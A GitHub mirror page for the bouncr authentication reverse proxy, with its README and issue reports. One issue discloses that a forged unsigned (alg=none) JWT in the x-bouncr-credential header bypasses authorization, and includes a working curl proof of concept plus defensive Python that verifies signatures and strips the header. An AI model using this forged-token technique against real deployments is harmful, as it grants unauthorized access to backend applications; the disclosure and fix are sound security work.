
kawasima / bouncr Goto Github PK


A reverse proxy with authentication and authorization

License: Eclipse Public License 1.0

Languages: Java 99.65%, JavaScript 0.18%, HTML 0.12%, Shell 0.05%
Topics: authorization, authentication, permissions, audit, reverse-proxy

bouncr's Introduction

Bouncr

Bouncr is a reverse proxy that provides authentication and authorization for backend applications.


Bouncr has the following features:

  • Authenticate
    • Various types of credentials
      • Password
      • LDAP
      • OpenID Connect
    • Two-factor authentication (using Google Authenticator, etc.)
  • Authorization (based on Group - Role - Permission)
  • Sign in
  • Sign out
  • Audit
    • Show security activities
  • IdP
    • OpenID Connect provider
  • Administration pages
    • Manage users
    • Manage groups
    • Manage applications and realms
    • Manage roles
    • Manage OpenID Connect applications

(Figure: bouncr architecture)

Docker

You can build the Docker images of the API server and the proxy server using Jib:

% cd bouncr-api-server
% mvn -P\!dev,postgresql,hazelcast compile jib:dockerBuild
% cd bouncr-proxy
% mvn -P\!dev,postgresql,hazelcast compile jib:dockerBuild

docker-compose.yml runs the API server and the proxy server together with Hazelcast and a PostgreSQL database.

License

Copyright © 2017-2019 kawasima

Distributed under the Eclipse Public License, the same as Clojure.

bouncr's People

Contributors

blackawa, kawasima, kkasai, miyamoen, syobochim, yamatokeiichi


bouncr's Issues

ALTER TABLE ... CHANGE COLUMN ... needs a column_definition in MySQL.

V22__AlterInvitations.java creates DDL such as alter table oidc_invitations change oidc_sub oidc_payload; for the MySQL database, but it does not work.
It should be like alter table oidc_invitations change oidc_sub oidc_payload varchar(255); . This is confirmed to work on the command line.

Cannot create CreateUserProfiles

When bouncr is executed, the following error occurs, because regexp is a reserved word.
https://dev.mysql.com/doc/refman/5.6/ja/reserved-words.html

[main] INFO org.flywaydb.core.internal.command.DbMigrate - Migrating schema `bouncr` to version 20 - CreateCerts       
[main] INFO org.flywaydb.core.internal.command.DbMigrate - Migrating schema `bouncr` to version 21 - CreateUserProfiles
Exception in thread "main" org.flywaydb.core.api.FlywayException: Migration failed !
        at org.flywaydb.core.internal.resolver.jdbc.JdbcMigrationExecutor.execute(JdbcMigrationExecutor.java:47)
        at org.flywaydb.core.internal.command.DbMigrate.doMigrateGroup(DbMigrate.java:343)
        at org.flywaydb.core.internal.command.DbMigrate.access$900(DbMigrate.java:53)
        at org.flywaydb.core.internal.command.DbMigrate$4.call(DbMigrate.java:276)
        at org.flywaydb.core.internal.util.jdbc.TransactionTemplate.execute(TransactionTemplate.java:75)
        at org.flywaydb.core.internal.command.DbMigrate.applyMigrations(DbMigrate.java:273)
        at org.flywaydb.core.internal.command.DbMigrate.access$800(DbMigrate.java:53)
        at org.flywaydb.core.internal.command.DbMigrate$2.call(DbMigrate.java:210)
        at org.flywaydb.core.internal.command.DbMigrate$2.call(DbMigrate.java:146)
        at org.flywaydb.core.internal.dbsupport.mysql.MySQLNamedLockTemplate.execute(MySQLNamedLockTemplate.java:60)
        at org.flywaydb.core.internal.dbsupport.mysql.MySQLDbSupport.lock(MySQLDbSupport.java:129)
        at org.flywaydb.core.internal.metadatatable.MetaDataTableImpl.lock(MetaDataTableImpl.java:174)
        at org.flywaydb.core.internal.command.DbMigrate.migrate(DbMigrate.java:146)
        at org.flywaydb.core.Flyway$1.execute(Flyway.java:1010)
        at org.flywaydb.core.Flyway$1.execute(Flyway.java:971)
        at org.flywaydb.core.Flyway.execute(Flyway.java:1464)
        at org.flywaydb.core.Flyway.migrate(Flyway.java:971)
        at enkan.component.flyway.FlywayMigration$1.start(FlywayMigration.java:56)
        at enkan.component.flyway.FlywayMigration$1.start(FlywayMigration.java:42)
        at enkan.component.LifecycleManager.start(LifecycleManager.java:15)
        at java.util.stream.ForEachOps$ForEachOp$OfRef.accept(ForEachOps.java:184)
        at java.util.stream.ReferencePipeline$3$1.accept(ReferencePipeline.java:193)
        at java.util.LinkedList$LLSpliterator.forEachRemaining(LinkedList.java:1235)
        at java.util.stream.AbstractPipeline.copyInto(AbstractPipeline.java:481)
        at java.util.stream.AbstractPipeline.wrapAndCopyInto(AbstractPipeline.java:471)
        at java.util.stream.ForEachOps$ForEachOp.evaluateSequential(ForEachOps.java:151)
        at java.util.stream.ForEachOps$ForEachOp$OfRef.evaluateSequential(ForEachOps.java:174)
        at java.util.stream.AbstractPipeline.evaluate(AbstractPipeline.java:234)
        at java.util.stream.ReferencePipeline.forEach(ReferencePipeline.java:418)
        at enkan.system.EnkanSystem.start(EnkanSystem.java:83)
        at net.unit8.bouncr.Main.main(Main.java:21)
Caused by: com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'regexp varchar(100) null, min_length smallint null, max_length smallint null, po' at line 1
        at sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
        at sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)
        at sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
        at java.lang.reflect.Constructor.newInstance(Constructor.java:423)
        at com.mysql.jdbc.Util.handleNewInstance(Util.java:425)
        at com.mysql.jdbc.Util.getInstance(Util.java:408)
        at com.mysql.jdbc.SQLError.createSQLException(SQLError.java:943)
        at com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:3973)
        at com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:3909)
        at com.mysql.jdbc.MysqlIO.sendCommand(MysqlIO.java:2527)
        at com.mysql.jdbc.MysqlIO.sqlQueryDirect(MysqlIO.java:2680)
        at com.mysql.jdbc.ConnectionImpl.execSQL(ConnectionImpl.java:2483)
        at com.mysql.jdbc.ConnectionImpl.execSQL(ConnectionImpl.java:2441)
        at com.mysql.jdbc.StatementImpl.executeInternal(StatementImpl.java:845)
        at com.mysql.jdbc.StatementImpl.execute(StatementImpl.java:745)
        at com.zaxxer.hikari.pool.ProxyStatement.execute(ProxyStatement.java:92)
        at com.zaxxer.hikari.pool.HikariProxyStatement.execute(HikariProxyStatement.java)
        at db.migration.V21__CreateUserProfiles.migrate(V21__CreateUserProfiles.java:31)
        at org.flywaydb.core.internal.resolver.jdbc.JdbcMigrationExecutor.execute(JdbcMigrationExecutor.java:45)
        ... 30 more

SecureRandom.getInstance("NativePRNGNonBlocking") causes NoSuchAlgorithmException on Windows

On Windows 10, I would like to try it, but unfortunately it fails.
I examined this code and found that "NativePRNGNonBlocking" is not implemented on Windows.

https://qiita.com/aibax/items/29e09318ac85c4e93c1a
https://docs.oracle.com/javase/jp/8/docs/technotes/guides/security/StandardNames.html#SecureRandom

I would be glad if this report is helpful.

The stacktrace is as follows:

enkan> /start
enkan.exception.UnreachableException: This exception has proved a framework bug.
        at net.unit8.bouncr.component.BouncrConfiguration$1.start(BouncrConfiguration.java:33)
        at net.unit8.bouncr.component.BouncrConfiguration$1.start(BouncrConfiguration.java:25)
        at enkan.component.LifecycleManager.start(LifecycleManager.java:15)
        at java.util.stream.ForEachOps$ForEachOp$OfRef.accept(ForEachOps.java:184)
        at java.util.stream.ReferencePipeline$3$1.accept(ReferencePipeline.java:193)
        at java.util.LinkedList$LLSpliterator.forEachRemaining(LinkedList.java:1235)
        at java.util.stream.AbstractPipeline.copyInto(AbstractPipeline.java:481)
        at java.util.stream.AbstractPipeline.wrapAndCopyInto(AbstractPipeline.java:471)
        at java.util.stream.ForEachOps$ForEachOp.evaluateSequential(ForEachOps.java:151)
        at java.util.stream.ForEachOps$ForEachOp$OfRef.evaluateSequential(ForEachOps.java:174)
        at java.util.stream.AbstractPipeline.evaluate(AbstractPipeline.java:234)
        at java.util.stream.ReferencePipeline.forEach(ReferencePipeline.java:418)
        at enkan.system.EnkanSystem.start(EnkanSystem.java:83)
        at enkan.system.repl.PseudoRepl.lambda$new$2(PseudoRepl.java:51)
        at enkan.system.repl.PseudoRepl.lambda$run$8(PseudoRepl.java:149)
        at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
        at java.util.concurrent.FutureTask.run(FutureTask.java:266)
        at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
        at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
        at java.lang.Thread.run(Thread.java:748)

Reset a password

When a user has forgotten his password, there is no way to reset it.

bouncr-proxy can pass attacker's jwt to backend applications

Problem

bouncr-proxy allows attackers to access backend applications with any permissions.

  1. bouncr-proxy passes the jwt to the backend application with no signing algorithm.
  2. bouncr-proxy does not remove the x-bouncr-credential request header from requests coming from outside the proxy.

This means anyone can pass any jwt to backend applications.

How to reproduce

Run docker-compose.yml

docker-compose up -d

Create a jwt with this kind of payload:

{"name":"attacker","iss":"attacker","uid":"1","sub":"attacker","email":"[email protected]","permissions":["any_application:read"]}

Create a request to bouncr-api-server:

curl -XGET -H 'accept: application/json' -H 'content-type: application/json' -H 'x-bouncr-credential: eyJhbGciOiJub25lIiwia2lkIjpudWxsfQ.eyJuYW1lIjoiYXR0YWNrZXIiLCJpc3MiOiJhdHRhY2tlciIsInVpZCI6IjEiLCJzdWIiOiJhdHRhY2tlciIsImVtYWlsIjoiYXR0YWNrZXJAZXhhbXBsZS5jb20iLCJwZXJtaXNzaW9ucyI6WyJhbnlfYXBwbGljYXRpb246cmVhZCJdfQ.' localhost:3000/bouncr/api/applications | jq

This returns 200 OK.

How to resolve

bouncr-proxy should reject x-bouncr-credential or any backendHederName.
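The two fixes the report asks for, as an added example written for this page and not code from the bouncr project: the backend only accepts a credential token that carries a real HS256 signature under a key shared with the proxy (so an alg=none token such as the one in the reproduction step is refused), and the proxy drops any client-supplied x-bouncr-credential header before adding its own. The shared key, the session payload and the function names (sign_jwt, verify_jwt, forward_headers) are assumptions for the example; the header name is the one named in the issue.

```python
import base64
import binascii
import hashlib
import hmac
import json
from typing import Any, Dict, Optional

# Header bouncr-proxy uses to hand the user's JWT to the backend (name taken from the issue report).
CREDENTIAL_HEADER = "x-bouncr-credential"

# The alg=none token from the issue's reproduction step, kept here only as a rejection test case.
ALG_NONE_TOKEN = "eyJhbGciOiJub25lIiwia2lkIjpudWxsfQ.eyJuYW1lIjoiYXR0YWNrZXIiLCJpc3MiOiJhdHRhY2tlciIsInVpZCI6IjEiLCJzdWIiOiJhdHRhY2tlciIsImVtYWlsIjoiYXR0YWNrZXJAZXhhbXBsZS5jb20iLCJwZXJtaXNzaW9ucyI6WyJhbnlfYXBwbGljYXRpb246cmVhZCJdfQ."


def b64url_encode(data: bytes) -> str:
    # JWT uses unpadded base64url.
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    # Restore the padding the encoder stripped before decoding.
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_jwt(payload: Dict[str, Any], key: bytes) -> str:
    """Issue an HS256-signed JWT; this is what the proxy should hand to the backend (hypothetical helper)."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (
        b64url_encode(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    )
    signature = hmac.new(key, signing_input.encode("ascii"), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(signature)


def verify_jwt(token: str, key: bytes) -> Optional[Dict[str, Any]]:
    """Return the payload only if the token is HS256-signed with `key`; otherwise None.

    Rejects alg=none, any other algorithm, malformed tokens and bad signatures, so a
    token built by the client (as in the issue) is never trusted by the backend.
    """
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, signature_b64 = parts
    try:
        header = json.loads(b64url_decode(header_b64))
        payload = json.loads(b64url_decode(payload_b64))
        signature = b64url_decode(signature_b64)
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    # Pin the algorithm: "none" (and anything but HS256) is refused before any signature check.
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    expected = hmac.new(key, (header_b64 + "." + payload_b64).encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, signature):
        return None
    return payload if isinstance(payload, dict) else None


def forward_headers(inbound: Dict[str, str], session_payload: Optional[Dict[str, Any]], key: bytes) -> Dict[str, str]:
    """Build the header set the proxy sends upstream (hypothetical helper).

    Any client-supplied credential header is dropped (case-insensitively) before the proxy
    adds its own signed one, so the value the backend sees always comes from the proxy's
    authenticated session and never from the outside request.
    """
    outbound = {k: v for k, v in inbound.items() if k.lower() != CREDENTIAL_HEADER}
    if session_payload is not None:
        outbound[CREDENTIAL_HEADER] = sign_jwt(session_payload, key)
    return outbound


if __name__ == "__main__":
    key = b"constructed-shared-secret"  # constructed sample key
    request = {"Accept": "application/json", "X-Bouncr-Credential": ALG_NONE_TOKEN}
    print("forged token accepted by backend:", verify_jwt(ALG_NONE_TOKEN, key) is not None)
    upstream = forward_headers(request, {"sub": "alice", "permissions": ["app:read"]}, key)
    print("backend sees:", verify_jwt(upstream[CREDENTIAL_HEADER], key))
```

Both halves matter: stripping the inbound header alone still leaves the backend trusting whatever arrives if it ever faces the network directly, and signature checking alone still lets a forged header through if the proxy copies it forward; together they make the credential header a proxy-only channel.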

Please make table names lowercase when creating SQL with doma.

Some entities have their table name set in uppercase, like below.


However, all tables are created in lowercase, and in some situations the lower_case_table_names option cannot be set in MySQL.
It causes a table-not-found exception when setting a new password.
So, if there is no other use for it, please make table names lowercase when creating SQL with doma.

DDL creation failed.

The DDL for creating the password_credentials table failed.

Caused by: com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?, created_at timestamp not null, primary key (user_id), foreign key (user_id) r' at line 1
        at sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)
        at sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)
        at sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)
        at java.lang.reflect.Constructor.newInstance(Constructor.java:423)
        at com.mysql.jdbc.Util.handleNewInstance(Util.java:425)
        at com.mysql.jdbc.Util.getInstance(Util.java:408)
        at com.mysql.jdbc.SQLError.createSQLException(SQLError.java:943)
        at com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:3973)
        at com.mysql.jdbc.MysqlIO.checkErrorPacket(MysqlIO.java:3909)
        at com.mysql.jdbc.MysqlIO.sendCommand(MysqlIO.java:2527)
        at com.mysql.jdbc.MysqlIO.sqlQueryDirect(MysqlIO.java:2680)
        at com.mysql.jdbc.ConnectionImpl.execSQL(ConnectionImpl.java:2483)
        at com.mysql.jdbc.ConnectionImpl.execSQL(ConnectionImpl.java:2441)
        at com.mysql.jdbc.StatementImpl.executeInternal(StatementImpl.java:845)
        at com.mysql.jdbc.StatementImpl.execute(StatementImpl.java:745)
        at com.zaxxer.hikari.pool.ProxyStatement.execute(ProxyStatement.java:92)
        at com.zaxxer.hikari.pool.HikariProxyStatement.execute(HikariProxyStatement.java)
        at db.migration.V10__CreatePasswordCredentials.migrate(V10__CreatePasswordCredentials.java:28)
        at org.flywaydb.core.internal.resolver.jdbc.JdbcMigrationExecutor.execute(JdbcMigrationExecutor.java:45)
        ... 30 more

The DDL is like this:
create table password_credentials(user_id bigint not null, password varbinary(256) not null, salt varchar(16) not null, initial boolean not null default ?, created_at timestamp not null, primary key (user_id), foreign key (user_id) references users (user_id))
